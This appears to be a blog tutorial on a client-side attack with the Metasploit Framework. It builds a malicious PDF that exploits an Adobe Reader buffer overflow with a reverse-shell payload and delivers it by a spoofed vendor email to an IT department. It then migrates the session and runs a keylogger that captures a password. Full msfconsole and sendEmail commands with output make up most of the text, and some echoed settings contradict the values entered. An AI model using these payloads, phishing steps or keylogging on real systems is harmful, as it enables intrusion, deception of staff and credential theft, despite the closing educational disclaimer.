Client Side Exploits in Metasploit

In today’s rapidly evolving security landscape, social engineering has emerged as a dominant attack vector. Despite technological advancements, human vulnerability remains a persistent weakness. Social engineering, therefore, has become a critical concern in the realm of cybersecurity. In this blog post, we delve into the realm of client-side exploits to demonstrate the potential power of the Metasploit Framework (MSF).

Scenario: Our attacker is well-versed in information gathering techniques, utilizing tools such as the Metasploit Framework, Maltego, and more, to collect email addresses and pertinent data for launching social engineering client-side exploits.

After conducting a successful dumpster dive and scraping emails from the web, our attacker discovers two crucial pieces of information:

1. The victim organization employs “Best Computers” for technical services.
2. The IT Department’s email address is itdept@victim.com.

Objective: Our ultimate goal is to gain control over the IT Department’s computer and deploy a keylogger, enabling us to harvest passwords, sensitive information, and other valuable data.

Exploitation Technique: To accomplish our objective, we begin by loading the msfconsole, the powerful command-line interface of the Metasploit Framework. Subsequently, we aim to create a malicious PDF file that appears legitimate and evades detection by antivirus software or other security measures.

The chosen vulnerability for our client-side exploit is the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow. This vulnerability arises from a lack of adequate boundary checks on user-supplied data, leading to a stack-based buffer overflow. Consequently, an attacker can leverage this flaw to execute arbitrary code with the privileges of the targeted user or cause a denial of service by crashing the application.

So we start by creating our malicious PDF file for use in this client side exploit.

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME => BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.122
LHOST => 192.168.8.128
msf exploit(adobe_utilprintf) > set LPORT 4444
LPORT => 4455
msf exploit(adobe_utilprintf) > show options

Module options (exploit/windows/fileformat/adobe_utilprintf):

   Name      Current Setting                        Required  Description
   ----      ---------------                        --------  -----------
   FILENAME  BestComputers-UpgradeInstructions.pdf  yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.122    yes       The listen address
   LPORT     4444       yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.1.2 (Windows XP SP3 English)

Once we have all the options set the way we want, we run exploit to create our malicious file.

msf exploit(adobe_utilprintf) > exploit

[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...
[*] BestComputers-UpgradeInstructions.pdf stored at /root/.msf4/local/BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) >

So we can see that our pdf file was created in a sub-directory of where we are. . Before we send the malicious file to our victim we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4455
msf exploit(handler) > set LHOST 192.168.8.122
LHOST => 192.168.8.128
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Once our listener is primed and ready to receive the malicious payload, the next step is to deliver it to the unsuspecting victim. Thanks to the valuable information we gathered during our reconnaissance phase, including the email address of the victim’s IT Department, we can leverage a useful script called “sendEmail” to accomplish this task seamlessly.

With a cleverly crafted one-liner, we can effortlessly attach the malicious PDF file, select any SMTP server of our choice, and even compose an email that appears convincingly legitimate, originating from any desired sender address. This ingenious technique allows us to manipulate the email’s content to create an illusion of trustworthiness, increasing the chances of the victim opening the attached file.

By exploiting the flexibility of the “sendEmail” script, we gain complete control over the delivery process, ensuring that our malicious payload reaches the intended recipient without raising any suspicion. This enables us to leverage the power of social engineering to deceive the victim and initiate the client-side exploit seamlessly.

root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely,

Best Computers Tech Support
Aug 24 17:32:51 kali sendEmail[13144]: Message input complete.
Aug 24 17:32:51 kali sendEmail[13144]: Email was sent successfully!

As we can see here, the script allows us to put any FROM (-f) address, any TO (-t) address, any SMTP (-s) server as well as Titles (-u) and our malicious attachment (-a). Once we do all that and press enter we can type any message we want, then press CTRL+D and this will send the email out to the victim.

Now on the victim’s machine, our IT Department employee is getting in for the day and logging into his computer to check his email.

He sees the very important document and copies it to his desktop as he always does, so he can scan this with his favorite anti-virus program

As we can see, it passed with flying colors so our IT admin is willing to open this file to quickly implement these very important upgrades. Clicking the file opens Adobe but shows a greyed out window that never reveals a PDF. Instead, on the attackers machine what is revealed….

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
session[*] Meterpreter session 1 opened (192.168.8.122:4444 -> 192.168.8.130:49322)

meterpreter >

We now have a shell on their computer through a malicious PDF client side exploit. Of course what would be wise at this point is to move the shell to a different process, so when they kill Adobe we don’t lose our shell. Then obtain system info, start a key logger and continue exploiting the network.

meterpreter > ps

Process list
============

    PID   Name            Path                                 
    ---   ----            ----                                 
    852   taskeng.exe     C:\Windows\system32\taskeng.exe      
    1308  Dwm.exe         C:\Windows\system32\Dwm.exe          
    1520  explorer.exe    C:\Windows\explorer.exe              
    2184  VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    2196  VMwareUser.exe  C:\Program FilesVMware\VMware Tools\VMwareUser.exe
    3176  iexplore.exe    C:\Program Files\Internet Explorer\iexplore.exe
    3452  AcroRd32.exe    C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

meterpreter > sysinfo
Computer: Hajus-PC
OS      : Windows Vista (Build 6000, ).

meterpreter > use priv
Loading extension priv...success.

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
[*] Recording keystrokes...

root@kali:~# cat /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
Keystroke log started at Wed Mar 23 09:18:36 -0600 2011
Support,   I tried to open ti his file 4 times with no success.  I even had my admin and CFO tru   y it, but no one can get it to p open.  I turned on the rmote access server so you can log in to fix our p         this problem.  Our user name is MElas and password for that session is 23@#$mEDS.

Conclusion: Client-side exploits, particularly those employing social engineering techniques, continue to pose significant threats to organizations and individuals alike. The Metasploit Framework provides a powerful arsenal of tools that can be utilized by both security professionals and malicious actors. Understanding the mechanics of such exploits enables us to better defend against them and foster a safer digital environment.

Disclaimer: It is crucial to emphasize that this blog post is intended for educational purposes only. The utilization of client-side exploits without proper authorization is illegal and unethical. We encourage readers to employ their knowledge and skills responsibly, ensuring they adhere to all legal and ethical guidelines in their cybersecurity endeavors.

Remember, knowledge is power, and with great power comes great responsibility. Let us join forces to fortify our digital defenses and promote a more secure online world.